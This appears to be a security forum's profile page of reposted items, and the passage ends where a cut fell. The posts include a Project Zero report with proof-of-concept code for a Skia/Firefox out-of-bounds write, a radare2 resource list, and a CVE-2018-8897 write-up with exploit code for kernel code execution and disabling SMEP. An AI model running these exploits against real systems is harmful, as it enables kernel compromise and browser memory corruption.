Everything posted by Nytro

  1. Mobile Security Updates: Understanding the Issues. A Commission Report, February 2018. FEDERAL TRADE COMMISSION. Maureen K. Ohlhausen, Acting Chairman; Terrell McSweeny, Commissioner. Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
  2. Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write
Project Member, reported by ifratric@google.com, Feb 28

Issue description

Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674
Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941

In Skia, SkTDArray stores its length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:
(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369
(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382
(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383
and possibly others. In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T) or sizeof(T) * count are used.

An integer overflow in (2) above is especially dangerous, as it will cause too little memory to be allocated to hold the array, which will cause an out-of-bounds write when, for example, appending an element. I have successfully demonstrated the issue by causing an overflow in the fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5), which is used when rendering dashed paths. The PoC requires a lot of memory (my estimate is 16+1 GB for storing the path, plus an additional 16 GB for the SkTDArray we are corrupting); however, there might be less demanding paths for triggering SkTDArray integer overflows.
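For context, a checked version of this kind of growth path has to guard both the element-count addition and the byte-size multiplication. The sketch below is illustrative only (it is not Skia's code; the function and variable names are made up) and shows the two checks that are missing in the locations listed above:

#include <cstdint>
#include <cstdlib>
#include <limits>

// Grow an int-counted array by `extra` elements, refusing on any overflow.
bool safeGrowBy(int& fCount, int& fReserve, void*& fArray, size_t elemSize, int extra) {
    if (extra < 0 || fCount > std::numeric_limits<int>::max() - extra)
        return false;                                   // fCount + extra would overflow (case (2))
    int needed = fCount + extra;
    if (needed > fReserve) {
        // Grow by ~25% plus slack, doing the arithmetic in 64 bits.
        int64_t newReserve = (int64_t)needed + 4 + ((int64_t)needed >> 2);
        if (newReserve > std::numeric_limits<int>::max())
            return false;                               // capacity no longer fits in an int
        if ((uint64_t)newReserve > SIZE_MAX / elemSize)
            return false;                               // fReserve * sizeof(T) would overflow size_t
        void* p = realloc(fArray, (size_t)newReserve * elemSize);
        if (!p)
            return false;
        fArray = p;
        fReserve = (int)newReserve;
    }
    fCount = needed;
    return true;
}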
PoC program for Skia ================================================================= #include <stdio.h> #include "SkCanvas.h" #include "SkPath.h" #include "SkGradientShader.h" #include "SkBitmap.h" #include "SkDashPathEffect.h" int main (int argc, char * const argv[]) { SkBitmap bitmap; bitmap.allocN32Pixels(500, 500); //Create Canvas SkCanvas canvas(bitmap); SkPaint p; p.setAntiAlias(false); float intervals[] = { 0, 10e9f }; p.setStyle(SkPaint::kStroke_Style); p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0)); SkPath path; unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0}; path.moveTo(0, 0); unsigned numpoints = 1; unsigned i = 1; unsigned qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { path.quadTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { path.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { path.moveTo(0, 0); numpoints += 1; i = 1; } } printf("done building path\n"); canvas.drawPath(path, p); return 0; } ================================================================= ASan output: ASAN:DEADLYSIGNAL ================================================================= ==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0) #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65) #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c) #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17 #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21 #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9 #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688 #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14 #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12 #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24 #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18 #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9 #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226 #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) 
/usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9 #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5 #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5 #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519) The issue can also be triggered via the web in Mozilla Firefox PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer) ================================================================= <canvas id="canvas" width="64" height="64"></canvas> <br> <button onclick="go()">go</button> <script> var canvas = document.getElementById("canvas"); var ctx = canvas.getContext("2d"); function go() { ctx.beginPath(); ctx.mozImageSmoothingEnabled = false; ctx.webkitImageSmoothingEnabled = false; ctx.msImageSmoothingEnabled = false; ctx.imageSmoothingEnabled = false; linedasharr = [0, 1e+37]; ctx.setLineDash(linedasharr); quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613]; ctx.moveTo(0, 0); numpoints = 1; i = 1; qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { ctx.quadraticCurveTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { ctx.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { ctx.moveTo(0, 0); numpoints += 1; i = 1; } } alert("done building path"); ctx.stroke(); alert("exploit failed"); } </script> ================================================================= ASan output: AddressSanitizer:DEADLYSIGNAL ================================================================= ==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0) ==37732==The signal is caused by a WRITE memory access. 
#0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17 #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342 #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15 #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688 #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19 #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12 #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37 #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25 #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15 #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235 #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23 #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12 #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11 #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13 #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13 #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15 #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467 #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14 #18 0x1a432b56061a (<unknown module>) This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
  3. Awesome Radare2 A curated list of awesome projects, articles and the other materials powered by Radare2. What is Radare2? Radare is a portable reversing framework that can... Disassemble (and assemble for) many different architectures Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...) Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku Perform forensics on filesystems and data carving Be scripted in Python, Javascript, Go and more Visualize data structures of several file types Patch programs to uncover new features or fix vulnerabilities Use powerful analysis capabilities to speed up reversing Aid in software exploitation More info here. Table of Contents Books Videos Recordings Asciinemas Conferences Slides Tutorials and Blogs Tools Scripts Contributing Awesome Radare2 Materials Books R2 "Book" Radare2 Explorations Radare2 wiki Videos Recordings Creating a keygen for FrogSek KGM#1 - by @binaryheadache Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007 Introduction To Reverse Engineering With Radare2 Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2 Asciinemas metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL Filter for string's searching (urls, emails) Manual unpacking UPX on linux 64-bit Conferences r2con 2017 LinuxDays 2017 - Disassembling with radare2 SUE 2017 - Reverse Engineering Embedded ARM Devices radare demystified (33c3) r2con 2016 Reversing with Radare2 - OverDrive Conference Radare2 & frida hack-a-ton 2015 Radare from A to Z 2015 Reverse engineering embedded software using Radare2 - Linux.conf.au 2015 OggCamp - Shellcode - vext01 Slides and Workshops Radare2 cheat-sheet r2m2 - radare2 + miasm2 = ♥ Radare2 Workshop 2015 (Defcon) Emulating Code In Radare2 Radare from A to Z 2015 Radare2 Workshop 2015 (Hack.lu) Radare2 & frida hack-a-ton 2015 radare2: evolution radare2: from forensics to bindiffing Tutorials and Blogs Linux Malware by @MalwareMustDie Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn Reverse engineering a Gameboy ROM with radare2 - by @megabeets_ radare2 as an alternative to gdb-peda How to find offsets for v0rtex (by Siguza) Debugging a Forking Server with r2 Defeating IOLI with radare2 in 2017 Using r2 to analyse Minidumps Android malware analysis with Radare: Dissecting the Triada Trojan Solving game2 from the badge of Black Alps 2017 with radare2 ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2 ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2 Reversing EVM bytecode with radare2 Radare2’s Visual Mode Crackme0x03 Dissected with Radare2 Crackme0x02 Dissected with Radare2 Crackme0x01 Dissected with Radare2 Debugging Using Radare2… and Windows! 
- by @jacob16682 Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_ A journey into Radare 2 – Part 2: Exploitation - by @megabeets_ A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_ Reverse Engineering With Radare2 - by @insinuator Write-ups from RHME3 pre-qualifications at RADARE2 conference Hackover CTF 2016 - tiny_backdoor writeup radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object Reversing and Exploiting Embedded Devices: The Software Stack (Part 1) Binary Bomb with Radare2 - by @binaryheadache crackserial_linux with radare2 - by @binaryheadache Examining malware with r2 - by @binaryheadache Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx Radare2 of the Lost Magic Gadget - by @0xabe_io Radare 2 in 0x1E minutes - by @superkojiman Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2 Baleful was a challenge relased in picoctf At Gunpoint Hacklu 2014 With Radare2 - by @crowell Pwning With Radare2 - by @crowell Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe How to radare2 a fake openssh exploit - by jvoisin Disassembling 6502 code with Radare – Part I - by @ricardoquesada Disassembling 6502 code with Radare – Part II - by @ricardoquesada Unpacking shikata-ga-nai by scripting radare2 This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2 Raspberry PI hang instruction - by @pancake Solving avatao's "R3v3rs3 4" - by @sghctoma Reverse Engineering With Radare2, Part 1 - by @sam_symons Simple crackme with Radare2 - by @futex90 Pwning With Radare2 - by @crowell Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie ROPping to Victory ROPping to Victory - Part 2, split Tools Docker image encapsulates the reverse-engineering framework Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing rarop - graphical ROP chain builder using radare2 and r2pipe Radare2 and Frida better together Android APK analyzer based on radare2 Scripts helper radare2 script to analyze UEFI firmware modules ThinkPwn Scanner - by @d_olex and @trufae radare2-lldb integration create a YARA signature for the bytes of the current function A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr) Just a simple radare2 Jupyter kernel r2scapy - a radare2 plugin that decodes packets with Scapy A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table radare2 plugin - converts asm to pseudo-C code (experimental) A python script using radare2 for decrypt and patch the strings of GootKit malware Collection of scripts for radare2 for MIPS arch Extract functions and opcodes with radare2 - by @andrewaeva r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads Patch kextd using radare2 Python-r2pipe script that draws ascii and graphviz graphs of library dependencies Simple XOR DDOS strings deobfuscator - by @NighterMan Decode multiple shellcodes encoded with msfencode - by @NighterMan Baleful CTF task plugins Contributing Please refer the guidelines at contributing.md for details. Sursa: https://github.com/dukebarman/awesome-radare2
  4. I don't know how it is on the phone, but under Activity you can set how the personalized feed should look.
  5. I sometimes post the same way. The point is that those posts are useful. Among @OKQL's posts I found things I didn't know about, and in general I stay up to date with pretty much everything that comes out.
  6. 1. http://jsbeautifier.org/ 2. Replace eval with alert (for example) 3. http://jsbeautifier.org/ 4. You get eval again. I don't have time for more at the moment.
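To illustrate the recipe above, here is a hypothetical packed sample (not taken from any real site): the outer eval receives the next decoded layer as a string, so swapping eval for alert or console.log dumps that layer instead of executing it, and you beautify and repeat until the payload is readable.

// Hypothetical packed sample: the packer function returns the string 'alert("hello")'.
eval(function (p, a, c, k) {
    while (c--) { p = p.replace(new RegExp('\\b' + c + '\\b', 'g'), k[c]); }
    return p;
}('0("1")', 4, 4, ['alert', 'hello', '', '']));

// Step 2 of the recipe: replace eval with console.log (or alert) to print the decoded
// layer instead of running it, then run the output through jsbeautifier again.
console.log(function (p, a, c, k) {
    while (c--) { p = p.replace(new RegExp('\\b' + c + '\\b', 'g'), k[c]); }
    return p;
}('0("1")', 4, 4, ['alert', 'hello', '', '']));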
  7. Arbitrary Code Execution at Ring 0 using CVE-2018-8897
Can Bölük | May 11, 2018

Just a few days ago, a new vulnerability allowing an unprivileged user to run the #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom.

0x0: Setting Up the Basics

The fundamentals of this exploit are really simple, unlike its exploitation. When the stack segment is changed (whether via MOV or POP), interrupts are deferred until the next instruction completes. This is not a microcode bug but rather a feature added by Intel so that the stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception from user mode as if it came from CPL0. We can create a deferred-to-CPL0 exception by setting the debug registers in such a way that a #DB will be raised during the execution of the stack-segment-changing instruction, and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As mentioned by everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines as shown below:

#include <Windows.h>
#include <iostream>

void main()
{
    static DWORD g_SavedSS = 0;
    _asm
    {
        mov ax, ss
        mov word ptr [ g_SavedSS ], ax
    }

    CONTEXT Ctx = { 0 };
    Ctx.Dr0 = ( DWORD ) &g_SavedSS;
    Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
    Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    SetThreadContext( HANDLE( -2 ), &Ctx );

    PVOID FakeGsBase = ...;

    _asm
    {
        mov eax, FakeGsBase             ; Set eax to fake gs base
        push 0x23
        push X64_End
        push 0x33
        push X64_Start
        retf
    X64_Start:
        __emit 0xf3                     ; wrgsbase eax
        __emit 0x0f
        __emit 0xae
        __emit 0xd8
        retf
    X64_End:
        ; Vulnerability
        mov ss, word ptr [ g_SavedSS ]  ; Defer debug exception
        int 3                           ; Execute with interrupts disabled
        nop
    }
}

This example is 32-bit for the sake of showing ASM and C together; the final working code will be 64-bit. Now let’s start debugging: we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic; almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster:

#include <idc.idc>

static main()
{
    Message( "--- Step Till Next GS ---\n" );
    while( 1 )
    {
        auto Disasm = GetDisasmEx( GetEventEa(), 1 );
        if ( strstr( Disasm, "gs:" ) >= Disasm )
            break;
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
    }
}

0x1: Fixing the KPCR Data

Here are the few cases where we have to modify the GSBASE contents to pass through successfully:

– KiDebugTrapOrFault

KiDebugTrapOrFault:
...
MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. 
I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... 
.text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As 